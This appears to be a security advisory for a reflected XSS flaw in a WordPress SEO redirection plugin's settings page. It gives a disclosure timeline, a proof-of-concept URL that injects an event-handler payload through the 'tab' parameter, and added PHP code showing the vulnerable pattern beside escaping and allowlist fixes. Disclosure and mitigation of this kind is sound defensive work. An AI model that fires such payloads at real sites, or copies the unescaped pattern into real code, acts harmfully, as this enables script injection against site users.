The settings page of the plugin is vulnerable to reflected Cross-Site Scripting (XSS) because user input is not properly sanitised before being output in an attribute.

Timeline (WPScanTeam)
January 29th, 2021 - Report received, confirmed and escalated to the WordPress plugins team (who confirmed they had received the report)
March 16th, 2021 - No updates, disclosing
April 18th, 2021 - v6.4 released, fixing the issue
https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=on%22style%3D%22animation-name%3Aspinner%22+onanimationstart%3D%22alert%28origin%29%22%3E

Video: https://mega.nz/file/2kkH2ATT#Ip2SOS3ciG2QYVZp6ALyqGksAd6V-85rWPUFOmqUxUE
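The class of bug described above, shown next to two mitigations, as an added example that is not the plugin's own code and not the v6.4 fix. The function names, the hidden-input markup and the tab allowlist are assumptions; `htmlspecialchars()` stands in for WordPress's `esc_attr()` so the file runs without WordPress.

```php
<?php
// Added example, not the plugin's code. Function names, the markup and the
// tab allowlist are hypothetical.

// Vulnerable pattern: a request value concatenated into a quoted attribute.
function tab_field_unsafe(string $tab): string {
    return '<input type="hidden" name="tab" value="' . $tab . '">';
}

// Escaped for attribute context. WordPress provides esc_attr() for this;
// htmlspecialchars() is used here so the file runs stand-alone.
function tab_field_escaped(string $tab): string {
    $safe = htmlspecialchars($tab, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="tab" value="' . $safe . '">';
}

// Allowlist first, escape second: unknown tabs fall back to the default.
function tab_field_allowlisted(string $tab, array $allowed = ['general', 'advanced']): string {
    if (!in_array($tab, $allowed, true)) {
        $tab = $allowed[0];
    }
    return tab_field_escaped($tab);
}

// Query string copied from the proof-of-concept URL in this advisory.
$query = 'page=seo-redirection.php&tab=on%22style%3D%22animation-name%3Aspinner%22+onanimationstart%3D%22alert%28origin%29%22%3E';
parse_str($query, $params);
$tab = $params['tab'];

// Print the three renderings so the difference in the markup is visible.
echo tab_field_unsafe($tab), PHP_EOL;
echo tab_field_escaped($tab), PHP_EOL;
echo tab_field_allowlisted($tab), PHP_EOL;

// Regression check: the template itself contains six double quotes. Any more
// in the output means the value closed the attribute and added markup.
$template_quotes = 6;
if (substr_count(tab_field_unsafe($tab), '"') <= $template_quotes) {
    throw new RuntimeException('sample input no longer breaks out of the attribute');
}
foreach ([tab_field_escaped($tab), tab_field_allowlisted($tab)] as $html) {
    if (substr_count($html, '"') !== $template_quotes) {
        throw new RuntimeException('attribute value was not contained: ' . $html);
    }
}
echo 'escaped and allowlisted output keep the value inside the attribute', PHP_EOL;
```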
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Nguyen Anh Tien
Yes
2021-03-16 (about 2 years ago)
2021-03-16 (about 2 years ago)
2021-04-27 (about 2 years ago)